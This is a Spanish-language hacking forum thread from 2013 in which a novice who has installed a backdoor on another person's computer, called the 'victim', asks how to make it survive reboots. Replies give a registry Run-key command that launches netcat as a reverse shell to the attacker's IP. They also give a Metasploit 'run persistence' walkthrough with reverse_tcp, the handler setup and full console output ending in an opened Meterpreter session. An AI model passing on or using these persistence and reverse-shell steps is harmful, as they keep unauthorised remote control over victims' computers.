comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[SOLUCIONADO] Backdoor autorun ayuda!!!

  • 6 Respuestas
  • 2815 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado pelumon

  • *
  • Underc0der
  • Mensajes: 10
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« en: Octubre 01, 2013, 07:56:18 pm »
que tal banda bueno pues les cuanto que pude crear un backdoor e instalarlo en otra maquina con red diferente y todo marcha bien, lo que quiero saber es como lo instalo para que inicie en procesos cada que se prenda y apague la computadora ya intente con run presistence pero lo que no se es si se pone la ip de la maquina victima la externa o la local ya que en armitage me salen las 2, de echo eh intentado con las 2 pero no eh tenid exito gracias bandda salu2.....
« Última modificación: Agosto 08, 2014, 08:17:04 pm por Expermicid »

Desconectado q3rv0

  • *
  • Underc0der
  • Mensajes: 207
  • Actividad:
    1.67%
  • Reputación 1
  • %ERRORLEVEL%
    • Ver Perfil
    • q3rv0
    • Email
« Respuesta #1 en: Octubre 01, 2013, 10:22:02 pm »
Lo que podes hacer si ya tenes acceso a la maquina remota es decargar netcat y agregar la siguiente entrada al registro de windows para que el binario se ejecute cada vez que la maquina se inicie

Código: DOS
  1. reg add HKLM\SOFTWARE\microsoft\windows\currentversion\run /v backdoor /d "/ruta/nc.exe -vv tuip puerto -e cmd.exe"

Reemplaza /ruta/nc.exe por el destino original donde se va a encontrar el netcat, asi mismo con "tuip" y "puerto" por los valores correspondientes, Luego te pones a escuchar para obtener la shell inversa.



Web: No tienes permisos para ver links. Registrate o Entra con tu cuenta

Twitter: No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado pelumon

  • *
  • Underc0der
  • Mensajes: 10
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #2 en: Octubre 04, 2013, 01:38:39 am »
me comunico con la maquina con netcat y esto me abrira la sell?? pero despues, hehehe perdon aun soy novato

Desconectado TrollMine

  • *
  • Underc0der
  • Mensajes: 47
  • Actividad:
    0%
  • Reputación 0
  • GEEK POWER
    • Ver Perfil
    • Twitter
  • Skype: trollmine99
« Respuesta #3 en: Octubre 04, 2013, 10:57:40 am »
Antes de cerrar la sesión de meterpreter tenias que subir el troyano, exe, payload o como le quieras llamar, para que cuando entres a la shell, lo ejecutes, y se te abra la sesión.

 
Skype: trollmine99

Desconectado Darkan

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #4 en: Octubre 04, 2013, 05:45:50 pm »
yo creo que tienes que poner la ip atacante no la víctima

escribe run persistence -h para ver las opciones
escribiré run persistence -U -i 5 -p PUERTO -r IP

meterpreter > run persistence -U -i 5 -p 4444 -r 192.168.254.128
  • Running Persistance Script
  • Resource file for cleanup created at /root/.msf4/logs/persistence/DARKAN-PC_20131004.1419/DARKAN-PC_20131004.1419.rc
  • Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.254.128 LPORT=4444
  • Persistent agent script is 613979 bytes long
  • Persistent Script written to C:\Users\Darkan\AppData\Local\Temp\SvTZOaDOD.vbs
  • Executing script C:\Users\Darkan\AppData\Local\Temp\SvTZOaDOD.vbs
  • Agent executed with PID 6836
  • Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\cWizKCJgKCz
  • Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\cWizKCJgKCz


reiniciar..

msf > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 192.168.254.128
LHOST => 192.168.254.128
msf  exploit(handler) > set LPORT 4444
LPORT => 4444
msf  exploit(handler) > exploit
  • Started reverse handler on 192.168.254.128:4444
  • Starting the payload handler...
  • Sending stage (752128 bytes) to 192.168.254.1
  • Meterpreter session 1 opened (192.168.254.128:4444 -> 192.168.254.1:7510) at 2013-10-04 16:19:33 -0400


meterpreter >

y listo

Desconectado pelumon

  • *
  • Underc0der
  • Mensajes: 10
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #5 en: Octubre 09, 2013, 06:03:02 pm »
Si la pc victima esta encendida primero que la atante aun Asi se puede conectar o nesesita primero estar exploit ?

Desconectado pelumon

  • *
  • Underc0der
  • Mensajes: 10
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #6 en: Octubre 09, 2013, 06:03:57 pm »
Gracias por contestar salu2  8)

 

¿Te gustó el post? COMPARTILO!



[SOLUCIONADO] ¿Kali Linux o Kali Linux Ligth ?

Iniciado por worq

Respuestas: 2
Vistas: 6922
Último mensaje Noviembre 21, 2017, 12:28:54 pm
por Codig0Bit
[SOLUCIONADO] Multiuploader de imagenes con mysql, hosting de imagenes con mysql

Iniciado por graphixx

Respuestas: 4
Vistas: 2176
Último mensaje Marzo 26, 2013, 05:42:58 pm
por Xt3mP
[SOLUCIONADO] ¿Como publicar un software como software libre?

Iniciado por FuriosoJack

Respuestas: 2
Vistas: 1581
Último mensaje Mayo 23, 2017, 07:24:22 am
por HATI
[SOLUCIONADO] Linux Mint, errores, errores y mas errores...

Iniciado por n1sendev

Respuestas: 12
Vistas: 2815
Último mensaje Noviembre 22, 2017, 06:50:55 am
por RuidosoBSD
[SOLUCIONADO] Problem al instalar Windows "cualquier windows"

Iniciado por Made

Respuestas: 7
Vistas: 2924
Último mensaje Septiembre 03, 2012, 04:53:08 pm
por Made